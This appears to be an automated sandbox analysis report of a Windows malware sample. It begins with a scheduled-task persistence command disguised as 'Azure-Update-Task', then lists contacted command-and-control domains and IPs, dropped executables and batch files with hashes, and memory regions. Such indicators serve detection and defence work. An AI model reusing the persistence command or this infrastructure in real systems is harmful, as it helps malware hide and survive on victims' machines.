/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 telete.in udp
N/A 195.201.225.248:443 telete.in tcp
N/A 8.8.8.8:53 danielmi.ac.ug udp
N/A 185.215.113.77:80 danielmi.ac.ug tcp
N/A 45.67.231.40:80 45.67.231.40 tcp
N/A 8.8.8.8:53 danielmax.ac.ug udp
N/A 185.215.113.77:80 danielmax.ac.ug tcp
N/A 185.215.113.77:80 danielmax.ac.ug tcp
N/A 8.8.8.8:53 cdn.discordapp.com udp
N/A 162.159.133.233:443 cdn.discordapp.com tcp
N/A 162.159.133.233:443 cdn.discordapp.com tcp
N/A 162.159.133.233:443 cdn.discordapp.com tcp
N/A 162.159.133.233:443 cdn.discordapp.com tcp
N/A 8.8.8.8:53 sergio.ac.ug udp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 8.8.8.8:53 parhatcsafxz.ac.ug udp
N/A 8.8.8.8:53 heartdoaz.ac.ug udp
N/A 8.8.8.8:53 aertdfvaz.ac.ug udp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 8.8.8.8:53 parhatcsafxz.ac.ug udp
N/A 8.8.8.8:53 heartdoaz.ac.ug udp
N/A 8.8.8.8:53 aertdfvaz.ac.ug udp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 icacxndo.ac.ug udp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 8.8.8.8:53 parhatcsafxz.ac.ug udp
N/A 8.8.8.8:53 heartdoaz.ac.ug udp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 8.8.8.8:53 aertdfvaz.ac.ug udp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 8.8.8.8:53 parhatcsafxz.ac.ug udp
N/A 8.8.8.8:53 heartdoaz.ac.ug udp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 8.8.8.8:53 aertdfvaz.ac.ug udp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 8.8.8.8:53 parhatcsafxz.ac.ug udp
N/A 8.8.8.8:53 heartdoaz.ac.ug udp
N/A 8.8.8.8:53 aertdfvaz.ac.ug udp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 heartdoaz.ac.ug udp
N/A 8.8.8.8:53 aertdfvaz.ac.ug udp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 8.8.8.8:53 parhatcsafxz.ac.ug udp
N/A 8.8.8.8:53 aertdfvaz.ac.ug udp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 162.159.133.233:443 cdn.discordapp.com tcp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 8.8.8.8:53 icando.ug udp
N/A 8.8.8.8:53 parhatcsafxz.ac.ug udp
N/A 8.8.8.8:53 heartdoaz.ac.ug udp
N/A 8.8.8.8:53 icando.ug udp

Files

memory/2836-116-0x0000000000000000-mapping.dmp

C:\ProgramData\GFDyrtucbvfdg.exe

MD5 701f6f95d5e205b53b3a74403d46981a
SHA1 3e614af86675b0de761adb5d2fa271bfb3142b95
SHA256 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459
SHA512 a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15

C:\ProgramData\GFDyrtucbvfdg.exe

MD5 701f6f95d5e205b53b3a74403d46981a
SHA1 3e614af86675b0de761adb5d2fa271bfb3142b95
SHA256 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459
SHA512 a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15

memory/3252-120-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

MD5 93fffc6736b1dd95a4f4e88734e9d540
SHA1 509a9acffd9b9123fff2a3df9a860b829210f80a
SHA256 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0
SHA512 d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

MD5 93fffc6736b1dd95a4f4e88734e9d540
SHA1 509a9acffd9b9123fff2a3df9a860b829210f80a
SHA256 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0
SHA512 d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed

memory/3152-126-0x0000000000640000-0x000000000078A000-memory.dmp

memory/2836-127-0x0000000000440000-0x00000000004EE000-memory.dmp

memory/3252-128-0x0000000000450000-0x00000000004FE000-memory.dmp

memory/3496-129-0x000000000044003F-mapping.dmp

memory/3784-130-0x000000000041A684-mapping.dmp

C:\ProgramData\GFDyrtucbvfdg.exe

MD5 701f6f95d5e205b53b3a74403d46981a
SHA1 3e614af86675b0de761adb5d2fa271bfb3142b95
SHA256 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459
SHA512 a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15

memory/3248-132-0x0000000000417A8B-mapping.dmp

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

MD5 93fffc6736b1dd95a4f4e88734e9d540
SHA1 509a9acffd9b9123fff2a3df9a860b829210f80a
SHA256 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0
SHA512 d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed

memory/3496-135-0x0000000000400000-0x0000000000495000-memory.dmp

memory/3152-134-0x0000000003550000-0x0000000003558000-memory.dmp

memory/3496-136-0x0000000001F40000-0x0000000001F41000-memory.dmp

memory/3784-138-0x0000000000520000-0x000000000066A000-memory.dmp

memory/3248-139-0x0000000000400000-0x0000000000434000-memory.dmp

memory/3784-137-0x0000000000400000-0x0000000000420000-memory.dmp

memory/3248-140-0x00000000004A0000-0x00000000004A1000-memory.dmp

\Users\Admin\AppData\LocalLow\sqlite3.dll

MD5 f964811b68f9f1487c2b41e1aef576ce
SHA1 b423959793f14b1416bc3b7051bed58a1034025f
SHA256 83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7
SHA512 565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4

\ProgramData\sqlite3.dll

MD5 e477a96c8f2b18d6b5c27bde49c990bf
SHA1 e980c9bf41330d1e5bd04556db4646a0210f7409
SHA256 16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660
SHA512 335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

\ProgramData\nss3.dll

MD5 bfac4e3c5908856ba17d41edcd455a51
SHA1 8eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256 e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA512 2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

\ProgramData\mozglue.dll

MD5 8f73c08a9660691143661bf7332c3c27
SHA1 37fa65dd737c50fda710fdbde89e51374d0c204a
SHA256 3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd
SHA512 0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

memory/348-145-0x0000000000000000-mapping.dmp

memory/3680-146-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\nss3.dll

MD5 02cc7b8ee30056d5912de54f1bdfc219
SHA1 a6923da95705fb81e368ae48f93d28522ef552fb
SHA256 1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5
SHA512 0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\mozglue.dll

MD5 eae9273f8cdcf9321c6c37c244773139
SHA1 8378e2a2f3635574c106eea8419b5eb00b8489b0
SHA256 a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc
SHA512 06e43e484a89cea9ba9b9519828d38e7c64b040f44cdaeb321cbda574e7551b11fea139ce3538f387a0a39a3d8c4cba7f4cf03e4a3c98db85f8121c2212a9097

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\softokn3.dll

MD5 4e8df049f3459fa94ab6ad387f3561ac
SHA1 06ed392bc29ad9d5fc05ee254c2625fd65925114
SHA256 25a4dae37120426ab060ebb39b7030b3e7c1093cc34b0877f223b6843b651871
SHA512 3dd4a86f83465989b2b30c240a7307edd1b92d5c1d5c57d47eff287dc9daa7bace157017908d82e00be90f08ff5badb68019ffc9d881440229dcea5038f61cd6

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\freebl3.dll

MD5 60acd24430204ad2dc7f148b8cfe9bdc
SHA1 989f377b9117d7cb21cbe92a4117f88f9c7693d9
SHA256 9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97
SHA512 626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\freebl3.dll

MD5 60acd24430204ad2dc7f148b8cfe9bdc
SHA1 989f377b9117d7cb21cbe92a4117f88f9c7693d9
SHA256 9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97
SHA512 626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01

memory/3208-152-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\he9LmnMhHX.exe

MD5 abeb86fdec0060ffb80f364cabd30b1b
SHA1 3c9c7b3ee66ff071eb32848ad5a62fab9683427c
SHA256 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b
SHA512 c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4

C:\Users\Admin\AppData\Local\Temp\he9LmnMhHX.exe

MD5 abeb86fdec0060ffb80f364cabd30b1b
SHA1 3c9c7b3ee66ff071eb32848ad5a62fab9683427c
SHA256 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b
SHA512 c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4

memory/3956-155-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\Kr7vNWeR8w.exe

MD5 457e1bf09958f400b72e470e672dad6b
SHA1 15e2efa61dc81321614dfb32b45901b938f001d1
SHA256 d40371030031fc84f0cd14b20865ab1a243b4fb45c1afb4075067a97591bccee
SHA512 7caf3fcaf4b11eb1a3cb0cc708580a80b0a41b9c5f688afcc377e40d5b1f75ef0e37c4d1ed59f1c425c453f5659d5ccf5e87c499da41ed2058a8801d5e633da7

C:\Users\Admin\AppData\Local\Temp\Kr7vNWeR8w.exe

MD5 457e1bf09958f400b72e470e672dad6b
SHA1 15e2efa61dc81321614dfb32b45901b938f001d1
SHA256 d40371030031fc84f0cd14b20865ab1a243b4fb45c1afb4075067a97591bccee
SHA512 7caf3fcaf4b11eb1a3cb0cc708580a80b0a41b9c5f688afcc377e40d5b1f75ef0e37c4d1ed59f1c425c453f5659d5ccf5e87c499da41ed2058a8801d5e633da7

memory/736-158-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

memory/1408-161-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\rqJB2Bm7T4.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

memory/736-164-0x0000000000320000-0x0000000000321000-memory.dmp

memory/3208-165-0x0000000000670000-0x0000000000671000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\rqJB2Bm7T4.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

memory/1408-168-0x0000000000130000-0x0000000000131000-memory.dmp

memory/3956-170-0x0000000000610000-0x0000000000611000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe

MD5 3694ac62d90c1e9f89145f324dc0e204
SHA1 f2953a9ba829d6fd1e0955dbc95e55abd08234e1
SHA256 ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9
SHA512 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d

memory/788-171-0x0000000000000000-mapping.dmp

memory/2196-173-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe

MD5 3694ac62d90c1e9f89145f324dc0e204
SHA1 f2953a9ba829d6fd1e0955dbc95e55abd08234e1
SHA256 ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9
SHA512 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d

memory/736-175-0x0000000004BA0000-0x0000000004C00000-memory.dmp

memory/3208-176-0x0000000004FA0000-0x0000000005006000-memory.dmp

memory/736-177-0x0000000007600000-0x0000000007601000-memory.dmp

memory/1408-178-0x0000000004A80000-0x0000000004AE0000-memory.dmp

memory/1824-181-0x0000000000000000-mapping.dmp

memory/736-182-0x00000000071A0000-0x00000000071A1000-memory.dmp

memory/788-185-0x00000000004C0000-0x000000000060A000-memory.dmp

memory/3208-186-0x0000000005060000-0x0000000005061000-memory.dmp

memory/736-188-0x0000000004C70000-0x0000000004C71000-memory.dmp

memory/1408-187-0x0000000004AF0000-0x0000000004AF1000-memory.dmp

memory/736-189-0x0000000007110000-0x0000000007111000-memory.dmp

memory/3208-192-0x0000000004910000-0x0000000004912000-memory.dmp

memory/3208-193-0x0000000005110000-0x0000000005111000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

MD5 3eff1d28a83d7c01ebbd6fdbeeb51b9b
SHA1 4f34a875b74b9b002ab25fb2a95a18ce94fbb783
SHA256 668692f2c0638542a373e6622e97ab2e356a18d3b500a2bc82da133de1b7ac43
SHA512 1c64b1895f0d8aaec135e36f99ff95c63193230dd2a361513c6b1a9964630455ebe6c7504e8eb172f83784d6617b5bd5b06ea9d3f898ec2684b996c167710505

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

MD5 f2934056a7bec839dd054b65ca52830f
SHA1 4ea629bbe1d1b903a87e19843216a5189a54bfa3
SHA256 334ac1e50cf8d000929ab80b41491e8bbc47a4f1130528f4a97427216a5ab565
SHA512 777d0a9fa54e119353d55c7eb8df517ff15101732edb4f01cad2e1b99e2ff0f32195f3d34184bc0eb3c0747dca950da9709e9a200c95a9e2b3e8e17dc098c934

memory/3536-200-0x0000000000400000-0x0000000000405000-memory.dmp

memory/3536-201-0x0000000000400000-0x0000000000405000-memory.dmp

memory/3536-202-0x0000000000400000-0x0000000000405000-memory.dmp

memory/3536-204-0x00000000004019E4-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe

MD5 3694ac62d90c1e9f89145f324dc0e204
SHA1 f2953a9ba829d6fd1e0955dbc95e55abd08234e1
SHA256 ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9
SHA512 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d

memory/3536-206-0x0000000000400000-0x0000000000405000-memory.dmp

memory/2768-207-0x0000000000000000-mapping.dmp

memory/3444-208-0x0000000000000000-mapping.dmp

memory/2084-209-0x0000000000000000-mapping.dmp

memory/3444-210-0x0000000000540000-0x0000000000541000-memory.dmp

C:\Users\Public\Trast.bat

MD5 4068c9f69fcd8a171c67f81d4a952a54
SHA1 4d2536a8c28cdcc17465e20d6693fb9e8e713b36
SHA256 24222300c78180b50ed1f8361ba63cb27316ec994c1c9079708a51b4a1a9d810
SHA512 a64f9319acc51fffd0491c74dcd9c9084c2783b82f95727e4bfe387a8528c6dcf68f11418e88f1e133d115daf907549c86dd7ad866b2a7938add5225fbb2811d

memory/636-212-0x0000000000000000-mapping.dmp

C:\Users\Public\UKO.bat

MD5 eaf8d967454c3bbddbf2e05a421411f8
SHA1 6170880409b24de75c2dc3d56a506fbff7f6622c
SHA256 f35f2658455a2e40f151549a7d6465a836c33fa9109e67623916f889849eac56
SHA512 fe5be5c673e99f70c93019d01abb0a29dd2ecf25b2d895190ff551f020c28e7d8f99f65007f440f0f76c5bcac343b2a179a94d190c938ea3b9e1197890a412e9

memory/3004-214-0x0000000000000000-mapping.dmp

memory/2264-215-0x0000000000000000-mapping.dmp

memory/1804-216-0x0000000000000000-mapping.dmp

memory/3444-217-0x00000000006C0000-0x00000000006C1000-memory.dmp

memory/3444-218-0x0000000000590000-0x0000000000591000-memory.dmp

memory/3444-219-0x0000000010580000-0x00000000105F3000-memory.dmp

memory/3444-220-0x0000000002D10000-0x0000000002D80000-memory.dmp

memory/8-221-0x0000000000000000-mapping.dmp

C:\Users\Public\nest.bat

MD5 8ada51400b7915de2124baaf75e3414c
SHA1 1a7b9db12184ab7fd7fce1c383f9670a00adb081
SHA256 45aa3957c29865260a78f03eef18ae9aebdbf7bea751ecc88be4a799f2bb46c7
SHA512 9afc138157a4565294ca49942579cdb6f5d8084e56f9354738de62b585f4c0fa3e7f2cbc9541827f2084e3ff36c46eed29b46f5dd2444062ffcd05c599992e68

memory/3880-223-0x0000000000000000-mapping.dmp

memory/1408-224-0x00000000049F0000-0x0000000004A62000-memory.dmp

memory/736-226-0x0000000004CF0000-0x0000000004D62000-memory.dmp

memory/3208-225-0x0000000004F10000-0x0000000004F87000-memory.dmp

memory/3208-228-0x0000000004EA0000-0x0000000004EC6000-memory.dmp

memory/1408-229-0x0000000004B80000-0x0000000004B9F000-memory.dmp

memory/736-227-0x0000000004C80000-0x0000000004CA0000-memory.dmp

memory/1796-230-0x0000000000400000-0x0000000000408000-memory.dmp

memory/3956-231-0x0000000000400000-0x000000000040C000-memory.dmp

memory/1796-233-0x0000000000403BEE-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

C:\Users\Admin\AppData\Local\Temp\rqJB2Bm7T4.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

memory/3956-232-0x000000000040616E-mapping.dmp

memory/2660-240-0x0000000000000000-mapping.dmp

memory/2892-244-0x0000000000000000-mapping.dmp

memory/3532-242-0x0000000000000000-mapping.dmp

C:\Windows\temp\asj2ixla.inf

MD5 2a5c1249e02eb2c010ebff66acf0d053
SHA1 3944f3d13725cc1bf71259304814d7daa40c53dd
SHA256 2b9bcc3b0b0b6219ddffa38c9a01ca7cc77146b9c1b9abb047396dcd0e15c5de
SHA512 e7ea7cdb674a5981304dd20ffafebcffa5bb4b43dddafbf0d3f8bc669288d16f8057109ca686269bfba65cfd470aea894d5e7e930434243d7b0f4662419852ef

memory/2660-248-0x0000000000CF0000-0x0000000000CF1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp8907.tmp

MD5 50d737a225ebc2c2d077a343c3c11709
SHA1 0895a15e9a032de102190091cf69812a07ee4adf
SHA256 81ef09df8940f52e36e7a9ec58f173fca32589518e7842135537e1b162b1394e
SHA512 7eb2686149c67f9d8ae83c2832c9323a28f374997cf36007e7ec2c2c2463466a703a0bd1cc593ec500b7055a8f8b2a54ab7362d27b049b1ed856ad27626614a8

memory/2660-250-0x0000000006DC0000-0x0000000006DC1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\he9LmnMhHX.exe

MD5 abeb86fdec0060ffb80f364cabd30b1b
SHA1 3c9c7b3ee66ff071eb32848ad5a62fab9683427c
SHA256 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b
SHA512 c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4

memory/1956-252-0x0000000000400000-0x0000000000412000-memory.dmp

memory/1956-253-0x000000000040C71E-mapping.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\he9LmnMhHX.exe.log

MD5 0c2899d7c6746f42d5bbe088c777f94c
SHA1 622f66c5f7a3c91b28a9f43ce7c6cabadbf514f1
SHA256 5b0b99740cadaeff7b9891136644b396941547e20cc7eea646560d0dad5a5458
SHA512 ab7a3409ed4b6ca00358330a3aa4ef6de7d81eb21a5e24bb629ef6a7c7c4e2a70ca3accfbc989ed6e495fdb8eb6203a26d6f2a37b2a5809af4276af375b49078

C:\Users\Admin\AppData\Local\Temp\he9LmnMhHX.exe

MD5 abeb86fdec0060ffb80f364cabd30b1b
SHA1 3c9c7b3ee66ff071eb32848ad5a62fab9683427c
SHA256 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b
SHA512 c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4

memory/2660-258-0x0000000006B10000-0x0000000006B11000-memory.dmp

memory/2660-259-0x0000000006BB0000-0x0000000006BB1000-memory.dmp

memory/2660-260-0x0000000006D40000-0x0000000006D41000-memory.dmp

memory/2660-263-0x00000000074F0000-0x00000000074F1000-memory.dmp

memory/3956-264-0x0000000005530000-0x0000000005A2E000-memory.dmp

memory/3956-261-0x0000000005530000-0x0000000005A2E000-memory.dmp

memory/2660-265-0x0000000006780000-0x0000000006781000-memory.dmp

memory/2660-266-0x0000000006782000-0x0000000006783000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\wdRIxA75Iu.exe.log

MD5 0c2899d7c6746f42d5bbe088c777f94c
SHA1 622f66c5f7a3c91b28a9f43ce7c6cabadbf514f1
SHA256 5b0b99740cadaeff7b9891136644b396941547e20cc7eea646560d0dad5a5458
SHA512 ab7a3409ed4b6ca00358330a3aa4ef6de7d81eb21a5e24bb629ef6a7c7c4e2a70ca3accfbc989ed6e495fdb8eb6203a26d6f2a37b2a5809af4276af375b49078

memory/2332-268-0x0000000000000000-mapping.dmp

memory/1552-269-0x0000000000000000-mapping.dmp

memory/1552-273-0x0000000000DC0000-0x0000000000DC1000-memory.dmp

C:\Windows\temp\2hw54vq4.exe

MD5 f4b5c1ebf4966256f52c4c4ceae87fb1
SHA1 ca70ec96d1a65cb2a4cbf4db46042275dc75813b
SHA256 88e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03
SHA512 02a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e

memory/2660-271-0x0000000006C80000-0x0000000006C81000-memory.dmp

C:\Windows\Temp\2hw54vq4.exe

MD5 f4b5c1ebf4966256f52c4c4ceae87fb1
SHA1 ca70ec96d1a65cb2a4cbf4db46042275dc75813b
SHA256 88e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03
SHA512 02a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e

memory/2660-275-0x0000000007B50000-0x0000000007B51000-memory.dmp

memory/2768-276-0x0000000000000000-mapping.dmp

memory/196-277-0x0000000000000000-mapping.dmp

memory/2660-281-0x0000000007C80000-0x0000000007C81000-memory.dmp

memory/2768-283-0x0000021ACF020000-0x0000021ACF021000-memory.dmp

memory/2768-286-0x0000021ACF1D0000-0x0000021ACF1D1000-memory.dmp

memory/2768-289-0x0000021ACEF10000-0x0000021ACEF12000-memory.dmp

memory/2768-290-0x0000021ACEF13000-0x0000021ACEF15000-memory.dmp

memory/2768-310-0x0000021ACEF16000-0x0000021ACEF18000-memory.dmp

memory/1956-311-0x0000000005480000-0x0000000005481000-memory.dmp

memory/2660-321-0x0000000008B30000-0x0000000008B63000-memory.dmp

memory/2660-334-0x000000007F4F0000-0x000000007F4F1000-memory.dmp

memory/3948-351-0x0000000000000000-mapping.dmp

memory/804-356-0x0000000000000000-mapping.dmp

memory/3252-360-0x0000000000000000-mapping.dmp

memory/3468-367-0x0000000000000000-mapping.dmp

memory/3948-377-0x0000025273F10000-0x0000025273F12000-memory.dmp

memory/4168-376-0x0000000000000000-mapping.dmp

memory/2660-374-0x0000000006783000-0x0000000006784000-memory.dmp

memory/4280-384-0x0000000000000000-mapping.dmp

memory/3948-380-0x0000025273F13000-0x0000025273F15000-memory.dmp

memory/4376-392-0x0000000000000000-mapping.dmp

memory/4508-402-0x0000000000000000-mapping.dmp

memory/4636-412-0x0000000000000000-mapping.dmp

memory/804-423-0x0000027B04D60000-0x0000027B04D62000-memory.dmp

memory/804-426-0x0000027B04D63000-0x0000027B04D65000-memory.dmp

memory/3252-429-0x000001C771C80000-0x000001C771C82000-memory.dmp

memory/4376-432-0x0000022A56AF0000-0x0000022A56AF2000-memory.dmp

memory/4376-435-0x0000022A56AF3000-0x0000022A56AF5000-memory.dmp

memory/3252-438-0x000001C771C83000-0x000001C771C85000-memory.dmp

